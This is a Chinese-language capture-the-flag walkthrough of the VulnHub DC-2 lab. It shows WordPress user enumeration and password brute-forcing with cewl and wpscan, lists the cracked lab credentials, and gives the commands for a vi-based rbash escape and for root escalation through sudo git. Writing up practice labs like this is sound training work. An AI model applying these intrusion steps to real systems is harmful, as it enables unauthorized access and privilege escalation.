下载地址
- DC-2.zip (Size: 847 MB)
- Download: http://www.five86.com/downloads/DC-2.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip
- Download (Torrent): https://download.vulnhub.com/dc/DC-2.zip.torrent ( Magnet)
题目描述
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it's designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts, is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.
靶机测试
flag1
首先用nmap探测一下端口
可以发现有80端口和7744端口,7744端口是ssh端口。80端口做了一个重定向,重定向到了http://dc-2/
,直接访问IP访问失败
修改一下本地hosts文件,添加一行192.168.162.169 dc-2
即可访问成功
在首页上即可发现flag1页面,并得到之后的提示
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
flag2
根据第一个提示可知,需要用到cewl
去进行信息收集,得到密码字典。利用kali自带的cewl即可
cewl http://dc-2/ -w passwd.txt
通过首页可知这是一个wordpress框架,尝试找一下wordpress的后台
wordpress的后台登录页面为wp-login.php
,尝试访问http://dc-2/wp-login.php
即可成功访问后台页面
之后尝试利用kali自带的wpscan
去进行扫描,尝试发现用户名
wpscan --url http://dc-2/ -e u
一共发现了三个用户,将这三个用户写入user.txt
admin
jerry
tom
最后尝试登录
wpscan --url http://dc-2/ -U user.txt -P passwd.txt
发现jerry和tom均存可登录成功
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
尝试登录jerry,输入账号密码后即可登录成功
在pages页面发现flag2
得到flag2和之后的提示
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
flag3
第二个提示说如果不能再从wordpress里找到突破口,就换一种方法。该wordpress大部分后台管理功能都被删除了,没有后台getshell的方法了。ssh端口被特意改成了7744,怀疑可以直接ssh登录。利用tom用户的账号密码即可成功连上ssh。
不过连上之后是一个rbash,所有命令都执行不了。
稍微测试了一下,发现vi命令是可用的
也可以使用compgen -c
看一下有多少命令可用
也可以发现vi
那么直接vi一下flag3.txt即可,即可得到flag3和之后的提示
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
flag4
根据提示可知需要su jerry,怀疑flag4.txt在jerry用户目录下,那么就需要绕过rbash去命令执行cd
来进行读取。
不过也可以直接vi
读取一下../jerry/flag4.txt
即可成功得到flag4,,但这里还是先绕过rbash再解,为后续的解题做铺垫。
尝试利用vi生成个shell
:set shell=/bin/bash
:shell
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
将linux的命令环境变量映重置一下,即可成功命令执行。
或者可以把/bin/bash给一个变量,然后执行这个变量,之后重置一下环境变量即可。
BASH_CMDS[a]=/bin/sh;a
可以命令执行之后,cd到jerry用户目录,即可找到flag4.txt和之后的hint
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
flag5
最后一个提示虽然没有明说,但很明显需要做一个提权在root目录下寻找flag。
先利用python生成一个读写比较方便的ttybash
python -c "import pty;pty.spawn('/bin/bash')"
尝试sudo -l
一下,发现没有权限
那就切换到jerry用户,su jerry
即可,密码为adipiscing
再次尝试sudo -l
发现对git有root权限,那最后一步肯定就是git提权了,git提取有两种方式
sudo git help config
!/bin/bash或者!'sh'完成提权
sudo git -p help
!/bin/bash
提权成功后在root目录下读取最后一个flag即可
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.